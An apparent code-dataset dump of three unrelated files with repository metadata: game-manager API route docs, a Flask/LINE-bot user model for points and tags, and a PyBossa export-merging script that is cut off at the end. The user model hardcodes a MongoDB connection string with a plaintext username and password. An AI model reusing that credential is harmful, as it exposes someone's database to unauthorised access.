"name": "/settlement/add_defeated_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> a 'monster' string to this route to add it to the
settlement's list of defeated monsters:</p>
<code>{'monster': 'White Lion (First Story)}</code> or
<code>{'monster': 'Flower Knight Lvl 1'}</code>
<p><b>Important!</b> Watch the strings on this one and try to avoid
free text: if the API cannot parse the monster name and match it to
a known monster type/name, this will fail.</p>
""",
},
"settlement_rm_defeated_monster_settlement_id": {
"name": "/settlement/rm_defeated_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> a 'monster' string to this route to remove it from the
settlement's list of defeated monsters, i.e. the <code>sheet.defeated_monsters</code>
array/list: </p>
<code>{'monster': 'Manhunter Lvl 4'}</code>
<p>Attempts to remove strings that do NOT exist in the list will
not fail (i.e. they will be ignored and fail 'gracefully').</p>
""",
},
"settlement_add_monster_settlement_id": {
"name": "/settlement/add_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<P>Use this route to add quarry or nemesis type monsters to the
settlement. <b>POST</b> some JSON containing the handle of the monster to
add it:</p>
<code>{'handle': 'flower_knight'}</code>
<p>The API will determine whether the monster is a nemesis or a quarry
and add it to the appropriate list. For nemesis monsters, use the
<code>/settlement/update_nemesis_levels</code> route (below) to manage
the checked/completed levels for that nemesis.</p>
<p>Make sure to check the settlement JSON <code>game_assets.monsters</code>
and use the correct handle for the desired monster.</p>
""",
},
"settlement_rm_monster_settlement_id": {
"name": "/settlement/rm_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> some JSON containing a quarry or nemesis type monster handle
to remove it from the settlement's list:</p>
<code>{'handle': 'sunstalker'}</code>
<p>The API will determine whether the monster is a quarry or a nemesis.
When a nemesis monster is removed, its level detail is also removed.</p>
""",
},
"settlement_update_nemesis_levels_settlement_id": {
"name": "/settlement/update_nemesis_levels/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p>Use this method to update the Settlement sheet's <code>nemesis_encounters</code>
dictionary, i.e. to indicate that a nemesis encounter has occurred.</p>
<p>A typical dictionary might look like this:</p>
<code> "nemesis_encounters": {"slenderman": [], "butcher": [1,2]}</code>
<p>In this example, the settlement has (somehow) encountered a
a level 1 Butcher, but has not yet encountered a Slenderman.</p>
<p>To update the dictionary, <b>POST</b> some JSON that includes the
nemesis monster's handle and the levels that are complete.</p>
<p><b>POST</b> this JSON to reset/undo/remove Butcher encounters:<p>
<code>{"handle": "butcher", "levels": []}</code>
<p><b>POST</b> this JSON to record an encounter with a level 1 Manhunter:</p>
<code>{"handle": "manhunter", "levels": [1]}</code>
""",
},
"settlement_add_milestone_settlement_id": {
"name": "/settlement/add_milestone/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> a milestone handle (get it from <code>game_assets</code>
to this route to add it to the settlement's list of milestones:</p>
<code>{handle: 'game_over'}</code>
<p>...or...</p>
<code>{handle: 'innovations_5'}</code>
<p>This endpoint will gracefully fail and politely ignore dupes.</p>
""",
},
"settlement_rm_milestone_settlement_id": {
"name": "/settlement/rm_milestone/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> a milestone handle (get it from <code>game_assets</code> to this
route to remove it from the settlement's list of milestones:</p>
<code>{handle: 'pop_15'}</code>
<p>...or...</p>
<code>{handle: 'first_death'}</code>
<p>This endpoint will gracefully fail and politely ignore attempts to remove
handles that are not present.</p>
""",
},
"settlement_set_principle_settlement_id": {
"name": "/settlement/set_principle/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> some JSON to this route to set or unset a settlement principle.
Request the handle of the <code>principle</code> and the election you want to
make:</p>
<pre><code>
{
principle: 'conviction',
election: 'romantic',
}</code></pre>
<p>This route has a couple of unusual behaviors to note:</p>
<ul>
<li>It requires both keys (i.e. you will get a 400 back if you
<b>POST</b> any JSON that does not include both).</li>
<li>It will accept a Boolean for 'election', because this is how
you 'un-set' a principle.</li>
</ul>
<p> To un-set a principle, simply post the principle handle and set the
<code>election</code> key to 'false':</p>
<code>{principle: 'new_life', election: false}</code>
<p> <b>Important!</b> Adding principles to (or removing them from) a
settlement automatically modifies all current survivors, in many
cases. If you've got survivor info up on the screen when you set a principle,
be sure to refresh any survivor info after <b>POST</b>ing JSON to this route!
</p>\
""",
},
#
# location controls
#
"settlement_add_location_settlement_id": {
"name": "/settlement/add_location/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p> <b>POST</b> a location <code>handle</code> to this route to add
it to the settlement's Locations:</p>
<code>{'handle': 'bone_smith'}</code>
""",
},
"settlement_rm_location_settlement_id": {
"name": "/settlement/rm_location/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p>This is basically the reverse of <code>add_location</code>
and works nearly identically. <b>POST</b> a JSON representation of a
Location handle to remove it from the settlement's list:</p>
<code>{'handle': 'barber_surgeon'}</code>
""",
},
"settlement_set_location_level_settlement_id": {
"name": "/settlement/set_location_level/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p>For Locations that have a level (e.g. the People of the
Sun's 'Sacred Pool'), you may set the Location's level by posting
the <code>handle</code> of the location and the desired level:</p>
<code>{'handle': 'sacred_pool', 'level': 2}</code>
""",
},
#
# innovation controls
#
"settlement_get_innovation_deck_settlement_id": {
"name": "/settlement/get_innovation_deck/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>Retrieve the settlement's current innovation deck as an array of asset names
by default.</p>
<p>Alternately, you can <b>POST</b> the parameter
<code>return_type: "dict"</code> to this endpoint to get a hash of innovations
(representing the settlement's Innovation Deck) back from this endpoint.</p>
<p>In the hash, innovation assets are sorted by their name (i.e. <i>not</i>
by their handle):<p>
<pre><code>{
"albedo": {
"handle": "albedo",
"name": "Albedo",
"consequences": [
"citrinitas"
],
"endeavors": [
"gorm_albedo"
],
"expansion": "gorm",
"type_pretty": "Innovations",
"sub_type_pretty": "Expansion",
"type": "innovations",
"sub_type": "expansion",
"innovation_type": "science"
},
"bed": {
"handle": "bed",
"name": "Bed",
"type": "innovations",
"endeavors": [
"bed_rest"
],
"type_pretty": "Innovations",
"sub_type_pretty": "Innovation",
"survival_limit": 1,
"sub_type": "innovation",
"innovation_type": "home"
},
...
"symposium": {
"handle": "symposium",
"name": "Symposium",
"consequences": [
"nightmare_training",
"storytelling"
],
"type": "innovations",
"settlement_buff": "When a survivor innovates, draw an additional 2 Innovation Cards to choose from.",
"type_pretty": "Innovations",
"sub_type_pretty": "Innovation",
"survival_limit": 1,
"sub_type": "innovation",
"innovation_type": "education"
}
}
</code></pre>
""",
},
"settlement_add_innovation_settlement_id": {
"name": "/settlement/add_innovation/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p> <b>POST</b> an Innovation <code>handle</code> to this route to add
it to the settlement's Innovations:</p>
<code>{'handle': 'hovel'}</code>
<p>...or:</p><code>{'handle': 'mastery_club'}</code>
<p><b>Important!</b> As far as the API is concerned, Principles (e.g.
'Graves', 'Survival of the Fittest', etc. <u>are not innovations</u>
and you <u>will</u> break the website if you try to add a principle
as if it were an innovation.</p>
<p>Use <code>set_principle</code> (below) instead.</p>
""",
},
"settlement_rm_innovation_settlement_id": {
"name": "/settlement/rm_innovation/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>This is basically the reverse of <code>add_innovation</code>
and works nearly identically. <b>POST</b> a JSON representation of an
Innovation handle to remove it from the settlement's list:</p>
<code>{'handle': 'mastery_club'}</code>
""",
},
"settlement_set_innovation_level_settlement_id": {
"name": "/settlement/set_innovation_level/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>For Innovations that have a level (e.g. the Slenderman's 'Dark
Water Research'), you may set the Innovation's level by posting
the <code>handle</code> of the innovation and the level:</p>
<code>{'handle': 'dark_water_research', 'level': 2}</code>
""",
},
#
# timeline!
#
"settlement_get_timeline_settlement_id": {
"name": "/settlement/get_timeline/<settlement_id>",
"subsection": "settlement_manage_timeline",
"methods": ['GET'],
"desc": """\
<p>Hit this endpoint to get a JSON representation of the
settlement's timeline.</p>
<p>This is read-only and optimized for performance, so you'll
get a timeline MUCH faster using this route than one of the
routes that pulls down the whole settlement.</p>
""",
},
"settlement_add_lantern_years_settlement_id": {
"name": "/settlement/add_lantern_years/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p><b>POST</b> a number (int) of years to add to the settlement's
Timeline:</p>
<code>{years: 5}</code>
<p><b>NB:</b> Timelines are capped at 50 LYs. If you try to add
a number of years that would take you above 50 LYs, you'll get a
400 back.</p>
""",
},
"settlement_replace_lantern_year_settlement_id": {
"name": "/settlement/replace_lantern_year/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p>This is the preferred route for adding or removing events
from a Lantern year. It basically requires <b>POST</b>ing an
entire Lantern Year to the API, so be sure to understand the
<a href="#timelineDataModel">timeline data model</a> before
attempting to use this one.</p>
<p>Since a Lantern year is a hash of hashes, replacing one is
as simple as <b>POST</b>ing that hash to this route. To "blank
out" or remove all events from an LY, for example, you would
simply send a <b>POST</b> body like this:</p>
<code>{ly: {year: 5}}</code>
<p>Similarly, to add events to that LY, you could <b>POST</b>
something like this:</p>
<code>{ly: {year: 5, settlement_event: [{handle: 'core_open_maw', handle: 'core_clinging_mist'}]}</code>
<p>Finally, as the name suggests, this is an overwrite/replace
type method, and it does not do any "checks" or comparisons
between the data in the API and your incoming LY.</p>
<p>The best practice here, from a design standpoint, is to pull
down the settlement's timeline (e.g. using <code>get_timeline</code>
(above), let the user modify an individual LY as necessary, and
then to <b>POST</b> their modified LY back, in its entirety, to
this endpoint.</p>
""",
},
"settlement_set_current_lantern_year_settlement_id": {
"name": "/settlement/set_current_lantern_year/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p>To set the settlement's current LY, <b>POST</b> an int to this
endpoint:</p>
<code>{ly: 3}</code>
""",
},
#
# settlement admins
#
"settlement_add_admin_settlement_id": {
"name": "/settlement/add_admin/<settlement_id>",
"subsection": "settlement_admin_permissions",
"methods": ["POST","OPTIONS"],
"desc": """\
<p><b>POST</b> the email address of a registered user to add them to the
list of settlement administrators:</p>
<code>{login: 'demo@kdm-manager.com'}</code>
<p>Disclaimers:<ul><li>This will fail gracefully if the user's
email is in the list (so feel free to spam it).</li><li>This will
fail loudly if the email address does not belong to a registered
user: you'll get a 400 and a nasty message back.</li></ul>
</p>
""",
},
"settlement_rm_admin_settlement_id": {
"name": "/settlement/rm_admin/<settlement_id>",
"subsection": "settlement_admin_permissions",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>This is the reverse of the <code>add_admin</code> route.</p>
<p>Basically, you <b>POST</b> some JSON to the route including the email
of the user you want to remove from the settlement admins list:</p>
<code>{login: 'demo@kdm-manager.com'}</code>
<p>Like the <code>add_admin</code> route, this one fails gracefully
if you try to remove someone who isn't on the list, etc.</p>
""",
},
#
# settlement notes
#
"settlement_add_note_settlement_id": {
"name": "/settlement/add_note/<settlement_id>",
"subsection": "settlement_notes_management",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>Since any player in a game is allowed to create settlement
notes, the JSON required by this endpoint must include a user's
OID.</p>
<p>This endpoint supports the following key/value pairs:</p>
<table class="embedded_table">
<tr><th>key</th><th><b>R</b>/O</th><th>value</th></tr>
<tr>
<td class="small_key">author_id</td>
<td class="type"><b>R</b></type>
<td class="value">The creator's OID as a string.</td>
</tr>
<tr>
<td class="small_key">note</td>
<td class="type"><b>R</b></type>
<td class="value">The note as a string. We accept HTML here, so if you want to display this back to your users as HTML, you can do that.</td>
</tr>
<tr>
<td class="small_key">author</td>
<td class="type">O</type>
<td class="value">The creator's login, e.g. <code>demo@kdm-manager.com</code>, as a string. Best practice is to NOT include this, unless you really know what you're doing.</td>
</tr>
<tr>
<td class="small_key">lantern_year</td>
<td class="type">O</type>
<td class="value">The Lantern Year the note was created. Defaults to the current LY if not specified.</td>
</tr>
</table>
<p>For example, to add a new note to a settlement, your <b>POST</b>
body will, at a minimum, look something like this:</p>
<code>{author_id: "5a26eb1a4af5ca786d1ed548", note: "Nobody expects the Spanish Inquisition!"}</code>
<p><b>Important!</b> This route returns the OID of the
newly-created note:</p>
<code>{"note_oid": {"$oid": "5a2812d94af5ca03ef7db6c6"}}</code>
<p>...which can then be used to remove the note, if necessary
(see <code>rm_note</code> below).</p>
""",
},
"settlement_rm_note_settlement_id": {
"name": "/settlement/rm_note/<settlement_id>",
"subsection": "settlement_notes_management",
"methods": ["POST","OPTIONS"],
"desc": """\
<p><b>POST</b> the OID of a settlement note to remove it.</p>
<code>{_id: "5a26eb894af5ca786d1ed558"}</code>
<p>As long as you get a 200 back from this one, the note has
been removed. If you get a non-200 status (literally anything other
than a 200), something went wrong. </p>
""",
},
}
| [
"toconnell@tyrannybelle.com"
] | toconnell@tyrannybelle.com |
1aae5ab705875a61c1ac256f801c34bf867ac8a3 | 35fc464a495aef8ea4f80e85034c74f4f6dd6d60 | /Flask-3/wwwroot/data_model/user.py | d4987682e85410ed2fad54c7d81501e8b94b3a6c | [
"BSD-3-Clause"
] | permissive | yuu045-ran/Azure-Linux-Samples | be64b3ccafd316685147f985dae36bee4de816e4 | 29897b1ad6902e97d069e067d00b5938eced4740 | refs/heads/master | 2022-05-24T21:27:25.809023 | 2020-05-03T13:59:34 | 2020-05-03T13:59:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,421 | py | #coding=utf-8
from flask import Flask, jsonify, request, render_template,session
import pymongo
import pandas as pd
import datetime
import time
import numpy as np
# Model
from data_model.manager import *
from data_model.channel import *
from data_model.webhook import *
from data_model.user import *
from data_model.tags import *
# line bot 相關元件
from linebot import LineBotApi
from linebot.models import *
from linebot.exceptions import LineBotApiError
class User:
def __init__(self):
self.client = pymongo.MongoClient("mongodb://james:wolf0719@cluster0-shard-00-01-oiynz.azure.mongodb.net:27017/?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true&w=majority")
self.col_user = self.client.ufs.users
self.col_point_logs = self.client.ufs.point_logs
self.col_user_log = self.client.ufs.user_log
# 取得單一帳號資料
def get_once(self,user_id,channel_id):
find = {
"user_id": user_id,
"channel_id": channel_id
}
userdata = self.col_user.find_one(find)
del userdata["_id"]
return userdata
#確認帳號存在
def chk_once(self, user_id, channel_id):
find = {
"user_id": user_id,
"channel_id": channel_id
}
cursor = self.col_user.find(find)
if(cursor.count() == 0):
return False
else:
return True
# 新增使用者
def add_once(self,user_id,channel_id):
jsondata = {
"user_id":user_id,
"channel_id":channel_id,
"point":0,
"created_datetime":datetime.datetime.now(),
"last_datetime":datetime.datetime.now()
}
channel = Channel()
channel_info = channel.get_channel(channel_id)
channel_access_token = channel_info['channel_access_token']
line_bot_api = LineBotApi(channel_access_token)
profile = line_bot_api.get_profile(user_id)
jsondata['name'] = profile.display_name
jsondata['avator'] = profile.picture_url
jsondata['status_message'] = profile.status_message
self.col_user.insert_one(jsondata)
# 新增LOG
User().set_user_log(user_id,channel_id,"新增帳號")
return True
def update_user_main(self,user_id,channel_id,data):
find = {
"user_id":user_id,
"channel_id":channel_id,
}
data["last_datetime"] =datetime.datetime.now()
self.col_user.update_one(find,{"$set":data})
return True
# 設定使用者參數
def set_user_tag(self,user_id,channel_id,tag):
find = {
"user_id":user_id,
"channel_id":channel_id
}
tag = {
"tag":tag,
"date":datetime.datetime.now()
}
self.col_user.update_one(find,{"$push":{"tags":tag}})
# 更新最後操作時間和 log
data = {}
data["last_datetime"] =datetime.datetime.now()
self.col_user.update_one(find,{"$set":data})
User().set_user_log(user_id,channel_id,"設定 Tag:{}".format(tag))
# 設定 tag
tags = Tags()
# 如果是在追蹤清單中
if tags.chk_once(channel_id,tag) == True:
tag_limit = tags.chk_limit(channel_id,user_id,tag)
# 如果額度還夠
if tag_limit == True:
# 執行動作
tags.do_tag_act(channel_id, user_id,tag)
tags.set_tag_log(channel_id, user_id,tag)
return True
# 取得使用者有使用到的 TAG
def get_user_tags(self,user_id,channel_id):
find = {
"user_id":user_id,
"channel_id":channel_id
}
user_data = self.col_user.find_one(find)
res = []
if "tags" in user_data:
for t in user_data["tags"]:
if t['tag'] not in res:
res.append(t['tag'])
return res
# 取得所有人
def get_all_users(self,channel_id):
find = {
"channel_id":channel_id
}
datalist = []
for d in self.col_user.find(find):
del d["_id"]
datalist.append(d)
return list(datalist)
#============================================================================
#
#
# 點數控制
#
#
# =================================================================
# 新增點數
def add_point(self,user_id,channel_id,point,point_note):
user_data = User.get_once(self,user_id,channel_id)
# print(user_data)
old_point = 0
if 'point' in user_data:
old_point = user_data['point']
new_point = int(old_point) + int(point)
# 建立 log
log_data = {
"user_id":user_id,
"channel_id":channel_id,
'original':old_point,
"point":point,
"act":"add",
"update_datetime":datetime.datetime.now(),
"balance_point":new_point,
"point_note":point_note
}
self.col_point_logs.insert_one(log_data)
# 回寫主表
find = {
"user_id":user_id,
"channel_id":channel_id
}
self.col_user.update_one(find,{"$set":{"point":new_point}})
# 更新最後操作時間和 log
data = {}
data["last_datetime"] =datetime.datetime.now()
self.col_user.update_one(find,{"$set":data})
log = "新增點數({0}):{1}".format(point_note,point)
User().set_user_log(user_id,channel_id,log)
return new_point
# 扣除點數
def deduct_point(self,user_id,channel_id,point,point_note):
user_data = User.get_once(self,user_id,channel_id)
old_point = user_data['point']
new_point = old_point - point
# 建立 log
log_data = {
"user_id":user_id,
"channel_id":channel_id,
'original':old_point,
"point":point,
"act":"deduct",
"update_datetime":datetime.datetime.now(),
"balance_point":new_point,
"point_note":point_note
}
self.col_point_logs.insert_one(log_data)
# 回寫主表
find = {
"user_id":user_id,
"channel_id":channel_id
}
self.col_user.update_one(find,{"$set":{"point":new_point}})
# 更新最後操作時間和 log
data = {}
data["last_datetime"] =datetime.datetime.now()
log = "扣除點數({0}):{1}".format(point_note,point)
User().set_user_log(user_id,channel_id,log)
return new_point
# 取得交易紀錄
def get_point_logs(self,user_id,channel_id):
find = {
"user_id":user_id,
"channel_id":channel_id
}
logs_data = self.col_point_logs.find(find).sort("update_datetime",-1)
datalist = []
for row in logs_data:
del row["_id"]
datalist.append(row)
return list(datalist)
# 取得累績總點數
def lifetime_record(self,user_id,channel_id):
find = {
"user_id":user_id,
"channel_id":channel_id,
"act":"add"
}
pipeline = [
{'$match':find},
{'$group': {'_id': "$user_id", 'point': {'$sum': '$point'}}},
]
if self.col_point_logs.find(find).count() == 0:
return 0
else :
res = self.col_point_logs.aggregate(pipeline)
for data in res:
print(data)
return data['point']
def set_user_log(self, user_id,channel_id,log_msg):
log_data = {}
log_data['log_note'] = log_msg
log_data['datetime'] = datetime.datetime.now()
log_data['user_id'] = user_id
log_data['channel_id'] = channel_id
self.col_user_log.insert_one(log_data)
return True
def get_user_log(self,user_id,channel_id):
find = {
"user_id": user_id,
"channel_id": channel_id
}
logs_data = self.col_user_log.find(find).sort("datetime",-1)
datalist = []
for row in logs_data:
del row["_id"]
datalist.append(row)
return list(datalist)
| [
"39946188+shengdamao@users.noreply.github.com"
] | 39946188+shengdamao@users.noreply.github.com |
11dab269946bcb383552e513d1c5b90dd10c2af2 | 2a56d481855e3621f2c7ffce455bb76f79e6cbea | /bin/mergeExport.py | d0a339644dddbd1941fbce1dfa3a5501a2f8be1c | [
"BSD-3-Clause"
] | permissive | SkyTruth/CrowdProjects | 26ad6bec809f068f8fca032f22e1a8d6982b21b7 | eede4c97ca5195d8ad39ce353c962f588e52c6ad | refs/heads/master | 2021-01-23T06:29:08.526153 | 2016-12-20T17:45:58 | 2016-12-20T17:45:58 | 18,370,679 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,431 | py | #!/usr/bin/env python
# This document is part of CrowdTools
# https://github.com/SkyTruth/CrowdTools
# =================================================================================== #
#
# New BSD License
#
# Copyright (c) 2014, SkyTruth, Kevin D. Wurster
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# =================================================================================== #
"""
Combine the contents of PyBossa's exported task.json and task_run.json
"""
import os
import sys
import json
from os.path import *
#/* ======================================================================= */#
#/* File Specific Information
#/* ======================================================================= */#
__docname__ = basename(__file__)
__all__ = ['print_usage', 'print_help', 'print_license', 'print_help_info', 'print_version', 'get_task',
'adjust_fields', 'main']
#/* ======================================================================= */#
#/* Build Information
#/* ======================================================================= */#
__version__ = '0.1-dev'
__release__ = '2014-06-23'
__copyright__ = 'Copyright 2014, SkyTruth'
__author__ = 'Kevin Wurster'
__license__ = '''
New BSD License
Copyright (c) 2014, Kevin D. Wurster
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* The names of its contributors may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
#/* ======================================================================= */#
#/* Define print_usage() function
#/* ======================================================================= */#
def print_usage():
"""
Print commandline usage
:return: returns 1 for for exit code purposes
:rtype: int
"""
print("""
Usage:
{0} --help-info
{0} [options] task.json task_run.json outfile.json
Options:
--overwrite Overwrite output file
--prefix=str Prefix for all task fields
[default: _t_]
""".format(__docname__))
return 1
#/* ======================================================================= */#
#/* Define print_help() function
#/* ======================================================================= */#
def print_help():
"""
Print more detailed help information
:return: returns 1 for for exit code purposes
:rtype: int
"""
print("""
Help: {0}
------{1}
Loops through all task runs and appends the matching task's fields to the task
run. A string is prepended to all task fields in order to prevent overwriting
fields that exist in both the task and task run - this prefix can be set by the
user via the '--prefix=str' option.
""".format(__docname__, '-' * len(__docname__)))
return 1
#/* ======================================================================= */#
#/* Define print_license() function
#/* ======================================================================= */#
def print_license():
"""
Print licensing information
:return: returns 1 for for exit code purposes
:rtype: int
"""
print(__license__)
return 1
#/* ======================================================================= */#
#/* Define print_help_info() function
#/* ======================================================================= */#
def print_help_info():
"""
Print a list of help related flags
:return: returns 1 for for exit code purposes
:rtype: int
"""
print("""
Help Flags:
--help-info This printout
--help More detailed description of this utility
--usage Arguments, parameters, flags, options, etc.
--version Version and ownership information
--license License information
""")
return 1
#/* ======================================================================= */#
#/* Define print_version() function
#/* ======================================================================= */#
def print_version():
"""
Print the module version information
:return: returns 1 for for exit code purposes
:rtype: int
"""
print("""
%s version %s - released %s
%s
""" % (__docname__, __version__, __release__, __copyright__))
return 1
#/* ======================================================================= */#
#/* Define get_task()
#/* ======================================================================= */#
def get_task(task_id, tasks_object):
"""
Find the matching task.json for a given task_run.json 's task_id
:param task_id: task_run.json['task_id']
:type task_id: int
:param tasks_object: tasks from json.load(open('task.json'))
:type tasks_object: list
:return: a JSON task object from task.json
:rtype: dict
"""
task = None
for t in tasks_object:
if t['id'] == task_id:
task = t
break
return task
#/* ======================================================================= */#
#/* Define adjust_fields()
#/* ======================================================================= */#
def adjust_fields(prefix, task):
"""
Prepend the prefix to a task's fields
:param prefix: string prepended to task fields
:type prefix: str
:param task: a JSOn task object from task.json
:type task: dict
:return: a modified JSON task object from task.json
:rtype: dict
"""
output_task = {}
for field, content in task.items():
output_task[prefix + field] = content
return output_task.copy() # Make sure we don't return a pointer
#/* ======================================================================= */#
#/* Define main()
#/* ======================================================================= */#
def main(args):
"""
Commandline logic
:param args: commandline arguments from sys.argv[1:]
:type args: list|tuple
:return: 0 on success and 1 on failure
:rtype: int
"""
#/* ======================================================================= */#
#/* Defaults
#/* ======================================================================= */#
# I/O configuration
overwrite_outfile = False
field_prefix = '_t_'
#/* ======================================================================= */#
#/* Containers
#/* ======================================================================= */#
# Input/output files
task_file = None
task_run_file = None
output_file = None
# JSON objects
tasks = None
task_runs = None
output_json = None
#/* ======================================================================= */#
#/* Parse Arguments
#/* ======================================================================= */#
arg_error = False
i = 0
while i < len(args):
try:
arg = args[i]
# Help arguments
if arg in ('--help-info', '-help-info', '--helpinfo', '-help-info'):
return print_help_info()
elif arg in ('--help', '-help', '--h', '-h'):
return print_help()
elif arg in ('--usage', '-usage'):
return print_usage()
elif arg in ('--version', '-version'):
return print_version()
elif arg in ('--license', '-usage'):
return print_license()
# I/O options
elif arg in ('--overwrite', '-overwrite'):
i += 1
overwrite_outfile = True
# Processing options
elif '-prefix=' in arg:
i += 1
field_prefix = arg.split('=', 1)[1]
# Positional arguments and errors
else:
# Catch task.json
if task_file is None:
i += 1
task_file = arg
# Catch task_run.json
elif task_run_file is None:
i += 1
task_run_file = arg
# Catch output.json
elif output_file is None:
i += 1
output_file = arg
# Catch errors
else:
i += 1
arg_error = True
print("ERROR: Invalid argument: %s" % str(arg))
except IndexError:
arg_error = True
print("ERROR: An argument has invalid parameters")
#/* ======================================================================= */#
#/* Validate configuration
#/* ======================================================================= */#
bail = False
# Check arguments
if arg_error:
bail = True
print("ERROR: Did not successfully parse arguments")
# Check task.json file
if task_file is None:
bail = True
print("ERROR: Need a task.json file")
if task_file is not None and not isfile(task_file):
bail = True
print("ERROR: Can't find task.json file: %s" % task_file)
elif not os.access(task_run_file, os.R_OK):
bail = True
print("ERROR: Need read permission: %s" % task_file)
# Check task_run.json file
if task_run_file is None:
bail = True
print("ERROR: Need a task_run.json file")
if task_run_file is not None and not isfile(task_run_file):
bail = True
print("ERROR: Can't find task_run.json file: %s" % task_run_file)
elif not os.access(task_run_file, os.R_OK):
bail = True
print("ERROR: Need read permission: %s" % task_run_file)
# Check output file
if output_file is None:
bail = True
print("ERROR: Need an output file")
if output_file is not None and isfile(output_file) and not overwrite_outfile:
bail = True
print("ERROR: Output file exists and overwrite=%s: %s" % (str(overwrite_outfile), output_file))
elif not os.access(dirname(output_file), os.W_OK):
bail = True
print("ERROR: Need write permission: %s" % dirname(output_file))
# Processing options
if field_prefix == '':
bail = True
print("ERROR: Field prefix cannot be an empty string - this will cause data to be overwritten")
# Exit if necessary
if bail:
return 1
#/* ======================================================================= */#
#/* Load data
#/* ======================================================================= */#
print("Loading data...")
# Load task.json
with open(task_file, 'r') as f:
tasks = json.load(f)
print(" Found %s tasks" % str(len(tasks)))
# Load task_run.json
with open(task_run_file, 'r') as f:
task_runs = json.load(f)
print(" Found %s task runs" % str(len(task_runs)))
#/* ======================================================================= */#
#/* Process Data
#/* ======================================================================= */#
print("Processing data...")
output_json = []
i = 0
tot_tasks = len(task_runs)
for tr in task_runs:
# Update user
i += 1
sys.stdout.write("\r\x1b[K" + " %s/%s" % (str(i), str(tot_tasks)))
sys.stdout.flush()
# Get task and update task run
task = get_task(tr['task_id'], tasks)
if task is None:
print(" - SKIPPED: Did not find task for task run: %s" % tr['task_id'])
else:
task = adjust_fields(field_prefix, task)
for field, content in task.items():
tr[field] = content
output_json.append(tr)
#/* ======================================================================= */#
#/* Write Output
#/* ======================================================================= */#
print("")
print("Writing output...")
with open(output_file, 'w') as f:
json.dump(output_json, f)
#/* ======================================================================= */#
#/* Cleanup
#/* ======================================================================= */#
# Success
print("Done.")
return 0
#/* ======================================================================= */#
#/* Commandline Execution
#/* ======================================================================= */#
if __name__ == '__main__':
# Didn't get enough arguments - print usage and exit
if len(sys.argv) is 1:
sys.exit(print_usage())
# Got enough arguments - give sys.argv[1:] to main()
else:
